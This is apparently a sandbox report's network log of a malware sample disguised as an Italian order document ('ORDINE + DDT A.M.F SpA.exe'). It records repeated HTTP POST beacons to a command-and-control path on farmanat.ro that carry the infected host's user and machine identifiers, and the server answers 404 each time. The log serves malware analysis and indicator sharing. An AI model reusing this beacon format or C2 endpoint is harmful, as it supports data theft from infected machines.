Nov 25, 2021 10:49:19.208676100 CET	6505	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:19.242902994 CET	6506	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:19.300923109 CET	6506	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
135	192.168.11.20	49976	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:19.734179974 CET	6507	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:19.767852068 CET	6507	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:19.816936970 CET	6507	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
136	192.168.11.20	49977	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:20.231014013 CET	6508	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:20.265523911 CET	6508	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:20.316693068 CET	6509	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
137	192.168.11.20	49978	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:20.695065975 CET	6509	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:20.729275942 CET	6510	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:20.786034107 CET	6510	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
138	192.168.11.20	49979	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:21.204317093 CET	6511	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:21.237867117 CET	6511	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:21.291951895 CET	6511	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
139	192.168.11.20	49980	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:21.725256920 CET	6512	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:21.758807898 CET	6512	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:21.808264971 CET	6513	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.11.20	49849	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:09.857429981 CET	6325	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:09.891676903 CET	6325	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:09.977329016 CET	6325	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
140	192.168.11.20	49981	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:22.161051035 CET	6513	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:22.195099115 CET	6514	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:22.245876074 CET	6514	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
141	192.168.11.20	49982	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:22.694083929 CET	6515	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:22.727617025 CET	6515	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:22.777534008 CET	6515	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.11.20	49983	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:23.236989975 CET	6516	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:23.271222115 CET	6516	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:23.323570013 CET	6517	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.11.20	49984	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:23.750983953 CET	6517	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:23.784497976 CET	6518	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:23.836504936 CET	6518	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
144	192.168.11.20	49985	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:24.261506081 CET	6519	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:24.295780897 CET	6519	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:24.345724106 CET	6519	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
145	192.168.11.20	49986	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:24.765311003 CET	6520	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:24.799844980 CET	6520	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:24.850509882 CET	6521	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
146	192.168.11.20	49987	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:25.270320892 CET	6521	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:25.303807974 CET	6522	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:25.354125023 CET	6522	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
147	192.168.11.20	49988	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:25.783039093 CET	6523	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:25.816695929 CET	6523	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:25.870491982 CET	6523	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
148	192.168.11.20	49989	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:26.316917896 CET	6524	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:26.351032019 CET	6524	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:26.402348042 CET	6525	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
149	192.168.11.20	49990	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:26.841394901 CET	6525	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:26.874670982 CET	6526	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:26.926106930 CET	6526	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.11.20	49850	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:10.692074060 CET	6326	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:10.726584911 CET	6326	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:10.784281969 CET	6327	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
150	192.168.11.20	49991	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:27.357925892 CET	6527	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:27.392189026 CET	6527	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:27.442270994 CET	6527	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
151	192.168.11.20	49992	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:27.861742973 CET	6528	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:27.896306038 CET	6528	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:27.946178913 CET	6529	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
152	192.168.11.20	49993	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:28.402900934 CET	6529	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:28.436259985 CET	6530	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
